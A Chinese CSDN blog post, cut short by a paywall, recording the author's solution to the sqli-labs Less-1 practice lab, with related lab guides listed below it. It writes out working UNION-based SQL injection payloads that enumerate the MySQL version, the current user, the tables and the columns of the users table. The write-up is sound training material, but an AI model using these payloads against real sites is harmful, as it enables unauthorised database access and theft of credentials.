sqli-labs闯关记录(Less1-Less5)

最新推荐文章于 2024-02-24 20:58:57 发布
最新推荐文章于 2024-02-24 20:58:57 发布
阅读量353 收藏 1
点赞数 1
分类专栏: 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/108035979
版权
这篇博客详细记录了sqli-labs的Less-1至Less-5关卡的攻击过程,包括单引号字符型、数字型、单引号报错注入及双引号字符型和布尔型盲注。博主通过注入点判断、字段数量确认、数据查询等步骤,成功获取了数据库中的用户信息和密码。
摘要由CSDN通过智能技术生成

Basic Injection

Less-1 单引号字符型get报错注入

判断注入点

?id=1' and 1=2 -- +

在这里插入图片描述

确认字段数量

?id=1' order by 3 -- +

在这里插入图片描述在这里插入图片描述

查询用户,版本,当前数据库名

?id=-1' union select 1,version(),database()--+

在这里插入图片描述
这里可以将payload拿到mysql去执行看看结果

sql=select * from users where id='-1' union select 1,version(),database()

database=security
verion:5.5.53

?id=-1' union select 1,user(),3--+

user:root@localhost

查询当前数据库所有的表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1' union select 1,2,group_concat(table_name)from(information_schema.tables)where(table_schema)like('security')--+

在这里插入图片描述
tables:emails,referers,uagents,users
查询敏感表——users

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1' union select 1,2,group_concat(column_name)from(information_schema.columns)where(table_name)like('users')--+

最低0.47元/天 解锁文章
BROTHERYY
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs 21——40攻略
weixin_45880717的博客
02-02 1067
Less-21 基于错误的复杂的字符型Cookie注入 base64编码,单引号,报错型,cookie型注入。 本和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时...
sqli-labs Less-24(sqli-labs闯关指南 24)—二次注入
m0_54899775的博客
12-24 1017
sqli-labs Less-24(sqli-labs闯关指南 24)—二次注入
sql注入靶场练习
weixin_46976845的博客
03-19 5897
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumb 跑sqlmap 得知数据库账户密码都为root pass.2 注入与1相同 pass.3 括号闭合 注意 ?id=1’) union select 1,database().3 --+ pa
SQL注入
qq_40648358的博客
03-01 594
文章目录sqli-labsREADMELess-1盲注基础 sqli-labs README 写一篇sql注入的文章 乌市素质单男|复读机 基于buuoj的sqlilab环境:Buuoj——CTF界的高考题库 基于其他的比赛题目 只写一些我觉得比较好玩的,不分难度 持续更新 Less-1 写第一个是因为一点过滤都没有,可以作为一些paylaod的实验 传入参数?id=1回显 传入入 ?...
宝,我今天注入了,注入的想你的液[SQL注入之sqli-labs(Less1-6)]
MachineGunJoe666
06-17 561
什么是SQL注入 在开始靶场之前,先要清楚什么是SQL注入,可能大多数朋友都已经了解,但要给刚开始学习注入的朋友提一下,虽然不见得能起多大作用,但却能很好地帮助我们开始入门学习。SQL注入:SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 简单来说,就是网站的后台程序过于信赖用户的输入,没有对
SQL注入之sqli-labs(less1-7)
冷冷的oO
04-24 3618
注:靶场基本上每一的目标都是拿到数据库的用户名和密码。 Less-1 打开第一看到如下页面,“Dhakkan”是印度俚语,意思是愚蠢的人,页面提示让我们输入ID值作为参数。
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1400
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
m0_54899775的博客
12-30 1861
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
m0_54899775的博客
12-29 1637
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
sqli-labs Less-29、30、31(sqli-labs闯关指南 29、30、31)—服务器(两层)架构
m0_54899775的博客
12-26 1882
sqli-labs Less-29、30、31(sqli-labs闯关指南 29、30、31)—服务器(两层)架构
SQLi Labs实验指导书
12-23
sqlilabs, 渗透测试, 网络攻防,数据库安全, mysqlsql
SQL注入学习—sqlilabs环境搭建以及代码审计(1—10代码详解)持续更新1-65
qq_53717877的博客
10-13 936
目录 环境搭建 SQL注入概念讲解 代码审计 Less1: 源码讲解 Less2 源码讲解 Less3 源码讲解 Less4 源码讲解 Less5 源码讲解 Less6 源码讲解 Less7 源码讲解 Less8 源码讲解 Less9 源码讲解 Less10 源码讲解 环境搭建 Github上直接搜索sqli-labs直接会有源码,php、asp版本的都有,我这是使用的一个php经典版本,sql注入必备 Github链接:https://gith...
SQLi-Labs 学习笔记(Less 1-10)
Onlyme的博客
03-11 1万+
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/article/details/51457142Less-1 基于错误的 - get 单引号 - 字...
MYSQL注入(Welcome Dhakkan)
qq_43613772的博客
07-19 8299
第一步打开phpStudy,点击启动 打开浏览器输入要登录的题目网址, 、在网址后面输?id=1看一下效果和在数字1后面加一个符号’比较一下 从上述错误当中,我们可以看到提交到 sql 中的 1’在经过 sql 语句构造后形成 ‘1’’ LIMIT 0,1, 多加了一个 ’ 。我们可以尝试一下后面加尝试 ‘or 1=1–+ 尝试成功,正常返回数据。 接下来对前面的数据进行排序,利用的是order ...
How to do sql injections with SQLMAP
安全汪
11-20 653
--------书写只是为了更好的思考                                                                       By:PgHook 0x1 前面的废话 0x2 传统的手工   第一步、判断是否存在注入点   第二步、得到数据库的消息 0x3、sqlmap 传统用法   1、枚举数据库   2、列出数据库中
SQL injection-Boolian Based
qq_46635165的博客
09-23 191
sqli-labs_Less-8 布尔盲注: 通过页面的正确与不正确显示状态来获取数据库的信息; 实例: url?id=1 页面显示: url?id=1' 这里可以看到,从url传入参数只会显示一个 You are in … ,并且输出的内容对我们是没用,也没有报错信息显示,因此我们只能靠这个页面的上一串英文字符的出现或者消失来判断我们的 sql 语句是否被数据库执行,进而构造 sql 语句来猜解出数据库中的信息。 1,使用 length() 函数猜解解出当前数据库名的长度:(记得加单引号使后台sq
sqli-labs闯关笔记(Basic Injections)
末初的CSDN博客
05-05 1268
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs Less-1 单引号报错注入GET 对传入的id参数单引号包裹,并且未作任何出参处理 对单引号闭合,联合查询注入即可 可以看下当传入payload是如何拼接闭合进行注入的 http://127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,user(...
2.1 union联合查询注入
n0d_xy的博客
04-14 1337
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
sqli-lab教程——1-35通Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值